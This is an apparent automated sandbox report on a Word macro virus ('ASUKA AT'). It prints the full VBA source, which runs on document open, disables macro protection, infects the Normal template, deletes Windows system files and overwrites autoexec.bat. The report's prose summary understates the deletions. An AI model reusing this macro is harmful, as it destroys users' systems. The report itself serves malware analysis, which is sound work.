Verdict: MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, indicating it's designed to execute automatically when the document is opened. The macro attempts to disable virus protection and create a malicious 'c:\autoexec.bat' file, which would execute the 'ASUKA AT' payload. This suggests a classic macro-based malware delivery mechanism.
Heuristics (3)
- VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3203 bytes |

SHA-256: 31e73b283619827e9b0b519dc0d5d8f525cdcc8ca5aaee71bc784db0708a68e6
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Módulo1"
Private Declare Function Donde_esta_Windowsdirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Sub AutoOpen()
    Options.VirusProtection = False
    System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
    ShowVisualBasicEditor = False
    Dim DirName As String
    Dim Shinji As String
    DirName = Donde_esta_Windows()
    Shinji = DirName
    On Error GoTo RutinaDeError
    ActiveDocument.SaveAs FileName:=NormalTemplate.Path & "\" & NormalTemplate.Name, FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
    Kill (Shinji + "command.com")
    Kill (Shinji + "winfile.exe")
    Kill (Shinji + "\system\appwiz.cpl")
    Kill (Shinji + "\system\sysdm.cpl")
    'the files go here: c:\windows\explorer.exe, c:\windows\winfile.exe, c:\windows\command.com, c:\windows\system\appwiz.cpl, c:\windows\system\sysdm.cpl, remember to put Shinji
    Open "c:\autoexec.bat" For Output As #1
    Print #1, "@echo off"
    Print #1, "cls"
    Print #1, "ECHO *********************************************************"
    Print #1, "ECHO * *"
    Print #1, "ECHO * ViRuS: ASUKA AT *"
    Print #1, "ECHO * *"
    Print #1, "ECHO * AUTOR: *"
    Print #1, "ECHO * *"
    Print #1, "ECHO * ©©©© ZaHACKieL ©©©© *"
    Print #1, "ECHO * *"
    Print #1, "ECHO * LIMA - PERU *"
    Print #1, "ECHO * *"
    Print #1, "ECHO * 03/JUN/00 *"
    Print #1, "ECHO * *"
    Print #1, "ECHO * ®®®®®®®®®®®®®® *"
    Print #1, "ECHO * § § *"
    Print #1, "ECHO * § A.B.G § *"
    Print #1, "ECHO *********************************************************"
    Print #1, "pause"
    Close #1
    Application.Visible = False
RutinaDeError:
    Exit Sub
End Sub
Function Donde_esta_Windows() As String
    Dim Temp As String
    Dim Ret As Long
    Const MAX_LENGTH = 145
    Temp = String$(MAX_LENGTH, 0)
    Ret = Donde_esta_Windowsdirectory(Temp, MAX_LENGTH)
    Temp = Left$(Temp, Ret)
    If Temp <> "" And Right$(Temp, 1) <> "\" Then
        Donde_esta_Windows = Temp & "\"
    Else
        Donde_esta_Windows = Temp
    End If
End Function
```